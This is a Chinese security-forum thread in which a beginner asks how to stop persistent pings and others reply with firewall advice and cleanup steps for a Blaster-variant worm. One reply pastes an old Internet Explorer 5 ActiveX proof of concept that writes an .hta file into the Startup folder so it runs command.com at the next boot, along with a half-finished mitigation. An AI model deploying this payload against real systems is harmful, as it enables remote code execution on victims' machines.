论坛: 菜鸟乐园 标题: 我的电脑近来不断受人ping,有什么办法阻挡 复制本贴地址    
作者: zhufeng [zhufeng]    论坛用户   登录
同上

地主 发表时间: 08/19 19:49

回复: hitler007 [hitler007]   论坛用户   登录
没有办法,用防火墙阻挡了吧!

B1层 发表时间: 08/19 19:51

回复: bfn693 [bfn693]   论坛用户   登录
推荐用天网

B2层 发表时间: 08/19 21:27

回复: 迷絮 [catmi]   版主   登录
发个解决的帖子啊 你找

B3层 发表时间: 08/19 21:50

回复: ping123 [ping123]   论坛用户   登录
冲击波变种
该病毒会开启数百个的线程PING您IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机
紧急解决方案:停止一下两个服务:

  Network connections Sharing

  WINS Client

  在:%Windir%\system32\wins\

  目录下删除:

  SVCHOST.EXE

  DLLHOST.EXE 

  这两个文件,安装防火墙,并禁止PING



B4层 发表时间: 08/19 21:58

回复: langzi183 [langzi183]   论坛用户   登录
  不知为什么我不能删除SVCHOST.EXE,系统提示“有另外的程序哉使用源程序”


B5层 发表时间: 08/20 00:42

回复: tommy_he [tommy_he]   版主   登录
废话,2000以上的系统都不可以乱删了!

B6层 发表时间: 08/20 03:44

回复: chinared [chinared]   论坛用户   登录
用linux5.1,ping一下98就死了

在Win9x下(不知道在NT下的情况),IE5可以利用生成或者覆盖本地文件的方法来执行本地计算机中的任意程序,这个问题出在ActiveX Control "Object for Co nstructing type libraries for scriptlets"。它允许生成和覆盖本地文件,或者在任意文件中增加更多的一些内容。那么一段利用了这个漏洞的HTML就可以
写入一个HTML Application File(*.hta)到开始菜单里面“程序”中的“启动” ,当用户再次启动机器(或者被强迫重启),那么这个HTML Application文件就 会被执行。这个漏洞可以通过E-mail来执行。
这里提供一个示范的地址:http://www.nat.bg/~joro/scrtlb.html 
代码如下:

<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"

</object>
<SCRIPT> 
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta
"; 
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCR
IPT>alert('Written 
by Georgi Guninski  http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>"

scr.write();
</SCRIPT>
</object>


解决方法: 
把ActiveX scripting关掉,或者不


B7层 发表时间: 08/20 14:32

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号